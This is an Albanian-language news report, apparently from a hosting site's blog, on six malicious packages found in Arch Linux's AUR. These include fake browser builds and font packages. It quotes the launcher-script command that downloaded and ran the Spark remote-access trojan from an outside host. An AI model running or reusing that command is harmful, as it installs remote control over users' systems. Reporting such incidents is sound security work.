Në AUR-repozitorin e Arch Linux janë identifikuar edhe 6 paketa të dëmshme

Në depozitarin AUR (Arch User Repository), i përdorur në Arch Linux për shpërndarjen e paketave nga zhvillues të jashtëm, vazhdoi publikimi i kodeve të dëmshme, të integruara në paketat me ndërtimet jozyrtare të shfletuesve. Përveç paketave të dëmshme të identifikuara dy javë më parë, firefox-patch-bin, librewolf-fix-bin dhe zen-browser-patched-bin, në AUR u shtua paketa google-chrome-stable, e cila gjithashtu përmbante një modifikim që instalonte një komponent të dëmshëm, që ofronte qasje të largët në sistem.

NĂ« skedarin PKGBUILD tĂ« paketĂ«s problematike u identifikua instalimi i njĂ« skripti pĂ«r ekzekutimin e shfletuesit google-chrome-stable.sh, ku mes tĂ« tjerash kishte komandĂ«n ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘, qĂ« shkarkonte njĂ« malware tĂ« njohur nga shĂ«rbimi VirusTotal si trojanin Spark, i cili lejonte menaxhimin e largĂ«t tĂ« sistemit, ekzekutimin e proceseve, transferimin e skedarĂ«ve, inspektimin e trafikut dhe dĂ«rgimin e ekraneve tĂ« regjistruara.

Paketa e dĂ«mshme google-chrome-stable u ngarkua para dy ditĂ«sh dhe u fshi nga administratorĂ«t e AUR disa orĂ« pas shfaqjes. Pothuajse menjĂ«herĂ« pas fshirjes sĂ« google-chrome-stable, nĂ« AUR u ngarkuan dy paketa tĂ« tjera tĂ« dĂ«mshme — «chrome» dhe «chrome-bin», qĂ« pĂ«rmbanin njĂ« skenar tĂ« ngjashĂ«m pĂ«r instalimin e malware nĂ« sistemin e pĂ«rdoruesit.

Ka pasur edhe tre paketa të tjera me kode të dëmshme: ttf-mac-fonts-all, ttf-ms-fonts-all dhe gromit.

Burimi: opennet.ru

Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster